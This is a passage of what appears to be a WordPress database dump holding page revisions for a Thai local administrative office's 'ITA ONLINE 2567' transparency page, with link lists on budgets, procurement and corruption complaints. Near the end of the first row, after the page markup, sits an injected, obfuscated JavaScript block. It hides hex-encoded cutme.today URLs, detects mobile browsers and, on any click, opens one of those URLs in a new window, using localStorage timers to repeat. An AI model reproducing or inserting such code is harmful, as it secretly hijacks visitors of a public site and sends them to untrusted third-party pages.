class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_1087e8-9a\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_1087e8-9a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\">Q&amp;A</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_a3f15d-d7\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_a3f15d-d7\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_eb0ffb-85\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb0ffb-85\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_df06d7-11\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_df06d7-11\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_006068-f2\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_006068-f2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"_bcc767-12\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab_bcc767-12\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"_e603b6-8d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab_e603b6-8d\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"_ff999a-98\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab_ff999a-98\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_22db24-50\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_22db24-50\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_39740e-99\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_39740e-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"_387c35-4e\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab_387c35-4e\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"_ea5a2e-14\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab_ea5a2e-14\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ITA ONLINE 2567','','inherit','closed','closed','','871-revision-v1','','','2024-08-20 11:24:11','2024-08-20 04:24:11','',871,'http://pakhaeng.ssk.in.th/?p=896',0,'revision','',0),
(898,1,'2024-08-20 11:36:27','2024-08-20 04:36:27','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":892,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post-2.png\" alt=\"\" title=\"Is It a Gift Instagram Post\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"layout\":\"vtabs\",\"currentTab\":4,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#8ed1fc\",\"titleBgHover\":\"#8ed1fc\",\"titleBgActive\":\"#0693e3\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-4 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_a471bf-67\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_a471bf-67\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span 